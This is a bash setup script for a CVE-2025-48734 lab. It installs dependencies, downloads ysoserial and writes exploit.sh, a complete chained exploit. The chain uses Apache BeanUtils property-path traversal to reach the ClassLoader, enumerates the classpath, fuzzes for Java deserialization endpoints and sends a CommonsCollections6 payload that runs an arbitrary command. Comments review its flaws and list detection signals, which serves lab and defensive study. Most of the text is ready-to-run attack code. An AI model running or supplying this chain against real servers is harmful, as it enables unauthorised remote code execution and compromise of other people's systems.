#!/usr/bin/env bash
set -euo pipefail
# ============================================
# CVE-2025-48734 Lab - Kali Attack Tools
# Use ONLY in an isolated lab environment
# ============================================
#
# Lab bootstrap: installs curl/python3/JDK, fetches ysoserial into
# $HOME/lab-tools and writes the chained exploit.sh next to it.
#
# Arguments:
#   $1 - target host (default 10.211.55.10)
#   $2 - target port (default 8080)
#
# Review notes (outer script):
#   - apt-get needs root, and there is no EUID check; under `set -e` an
#     unprivileged run simply dies at the first apt-get line.
#   - ysoserial-all.jar is fetched from a "latest" URL and neither pinned
#     to a release nor verified (no checksum or signature), and `curl -sL`
#     has no `--fail`, so an HTTP error page would be saved under the jar
#     name and later executed by `java -jar`. Even for a lab tool that is a
#     supply-chain exposure: pin the release URL and compare the download
#     against a known-good SHA-256 (value to be recorded by the lab
#     maintainer) before it is ever run.

TARGET="${1:-10.211.55.10}"
PORT="${2:-8080}"
BASE_URL="http://$TARGET:$PORT"
TOOLS_DIR="$HOME/lab-tools"
# "latest" is a moving target; see the review note above.
YSOSERIAL_URL="https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar"

# Pretty-print stdin as JSON. Note: json.tool reads all of stdin before it
# can fail, so the `|| cat` fallback sees EOF and a non-JSON response is
# silently dropped (the parse error itself is hidden by 2>/dev/null).
pretty() { python3 -m json.tool 2>/dev/null || cat; }

mkdir -p "$TOOLS_DIR"
cd "$TOOLS_DIR"

# ---------- Dependencies ----------
echo "[*] Checking dependencies..."
apt-get update -q
apt-get install -y --no-install-recommends curl python3 default-jdk

# ---------- Download ysoserial ----------
# Skipped when a file of that name already exists; nothing checks that the
# existing file is actually a valid jar.
if [ ! -f ysoserial-all.jar ]; then
  echo "[*] Downloading ysoserial..."
  curl -sL "$YSOSERIAL_URL" -o ysoserial-all.jar
else
  echo "[*] ysoserial already downloaded"
fi

# ---------- Chained attack script ----------
# The heredoc delimiter is quoted, so the body is written to exploit.sh
# verbatim (no expansion here). Notes on the generated script, which is
# left byte-identical below:
#   - It has no `set -euo pipefail`: a failed curl, or an empty payload
#     from ysoserial (its stderr is discarded), is not detected and the
#     run simply continues to the next phase.
#   - The `$# -lt 3` usage check sits in PHASE 4, after three phases of
#     requests have already been sent to the target; the "[!] Usage" echo
#     also appears to have lost its argument placeholders in this copy.
#   - TOOLS_DIR is resolved as `$(dirname "$0")`, so exploit.sh must stay
#     in the same directory as ysoserial-all.jar.
#   - Detection surface for the defensive half of the lab: property-path
#     requests containing `declaringClass` / `classLoader`, and POSTs with
#     an application/octet-stream body beginning with the Java
#     serialization magic (0xACED), are the signals to alert on. A BeanUtils
#     build that rejects `declaringClass` traversal makes PHASE 1 abort
#     with the "PATCHED" message, which is the expected outcome on a
#     mitigated host.
cat > exploit.sh << 'EXPLOITEOF'
#!/usr/bin/env bash
TARGET="${1:-10.211.55.10}"
PORT="${2:-8080}"
BASE_URL="http://$TARGET:$PORT"
TOOLS_DIR="$(dirname "$0")"
pretty() { python3 -m json.tool 2>/dev/null || cat; }
echo ""
echo "============================================="
echo " PHASE 1 - Initial Reconnaissance"
echo "============================================="
echo "[*] Probing simple bean properties..."
curl -s "$BASE_URL/api/property?path=id" | pretty
echo ""
curl -s "$BASE_URL/api/property?path=status" | pretty
echo ""
echo "[*] Attempting access to declaringClass (CVE-2025-48734)..."
RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass")
echo "$RESULT" | pretty
echo ""
STATUS=$(echo "$RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null)
if [ "$STATUS" != "success" ]; then
  echo "[-] declaringClass blocked - application is PATCHED. Aborting."
  exit 1
fi
echo "[+] CVE-2025-48734 CONFIRMED - declaringClass accessible"
echo ""
echo "[*] Escalating to ClassLoader..."
CL_RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader")
echo "$CL_RESULT" | pretty
echo ""
CL_TYPE=$(echo "$CL_RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('valueClass',''))" 2>/dev/null)
echo "[+] ClassLoader obtained: $CL_TYPE"
echo ""
echo "============================================="
echo " PHASE 2 - Classpath Enumeration via CVE"
echo "============================================="
echo "[*] Iterating ClassLoader URLs via BeanUtils index notation..."
CC="NOT FOUND"
IDX=0
CLASSPATH_ENTRIES=()
while true; do
  ENTRY=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader.URLs%5B${IDX}%5D")
  ESTATUS=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null)
  if [ "$ESTATUS" != "success" ]; then
    break
  fi
  VAL=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('value',''))" 2>/dev/null)
  CLASSPATH_ENTRIES+=("$VAL")
  echo " [$IDX] $VAL"
  if echo "$VAL" | grep -q "commons-collections-3"; then
    CC="FOUND"
  fi
  IDX=$((IDX + 1))
done
echo ""
if [ "$CC" = "NOT FOUND" ]; then
  echo "[-] Commons Collections 3.x not found in classpath."
  echo "[-] No gadget chain available. Aborting."
  exit 1
fi
echo "[+] Commons Collections 3.x found - gadget chain available"
echo ""
echo "============================================="
echo " PHASE 3 - Deserialization Endpoint Discovery"
echo "============================================="
echo "[*] Fuzzing common import/sync endpoints..."
DESER_ENDPOINT=""
for path in "/api/data/import" "/api/import" "/api/sync" "/api/upload" "/api/data/sync"; do
  CODE=$(curl -s -o /dev/null -w "%{http_code}" \
    -X POST "$BASE_URL$path" \
    -H "Content-Type: application/octet-stream" \
    --data-binary $'\xac\xed\x00\x05')
  echo " POST $path → HTTP $CODE"
  if [ "$CODE" = "200" ] || [ "$CODE" = "400" ]; then
    # Verify ObjectInputStream by checking for EOFException signature
    RESP=$(curl -s -X POST "$BASE_URL$path" \
      -H "Content-Type: application/octet-stream" \
      --data-binary $'\xac\xed\x00\x05')
    if echo "$RESP" | grep -q "EOFException\|success\|error"; then
      DESER_ENDPOINT="$path"
      echo "[+] Deserialization endpoint found: $path"
      break
    fi
  fi
done
echo ""
if [ -z "$DESER_ENDPOINT" ]; then
  echo "[-] No deserialization endpoint found. Aborting."
  exit 1
fi
echo "============================================="
echo " PHASE 4 - Payload Generation and Delivery"
echo "============================================="
if [ $# -lt 3 ]; then
  echo "[!] Usage: $0 "
  echo "[!] Example: $0 10.211.55.10 8080 'id'"
  exit 1
fi
CMD="$3"
PAYLOAD_FILE="$TOOLS_DIR/payload.ser"
echo "[*] Generating ysoserial payload..."
echo " Chain: CommonsCollections6"
echo " Command: $CMD"
echo ""
java \
  --add-opens java.base/java.util=ALL-UNNAMED \
  --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
  --add-opens java.base/java.text=ALL-UNNAMED \
  --add-opens java.desktop/java.awt.font=ALL-UNNAMED \
  -jar "$TOOLS_DIR/ysoserial-all.jar" CommonsCollections6 "$CMD" > "$PAYLOAD_FILE" 2>/dev/null
echo "[*] Payload generated: $PAYLOAD_FILE ($(wc -c < "$PAYLOAD_FILE") bytes)"
echo "[*] Sending to endpoint $DESER_ENDPOINT..."
echo ""
curl -s -X POST "$BASE_URL$DESER_ENDPOINT" \
  -H "Content-Type: application/octet-stream" \
  --data-binary "@$PAYLOAD_FILE" | pretty
echo ""
echo "============================================="
echo " SUMMARY"
echo "============================================="
echo " CVE-2025-48734: EXPLOITED"
echo " Classpath via CVE: Commons Collections 3.x found"
echo " Deser endpoint: $BASE_URL$DESER_ENDPOINT"
echo " Payload: CommonsCollections6"
echo " Command executed: $CMD"
echo "============================================="
EXPLOITEOF
chmod +x exploit.sh

echo ""
echo "============================================="
echo " Tools ready in: $TOOLS_DIR"
echo "============================================="
echo " Usage:"
echo " ./exploit.sh $TARGET $PORT 'id'"
echo " ./exploit.sh $TARGET $PORT 'bash -c {id,}>/tmp/out.txt'"
echo "============================================="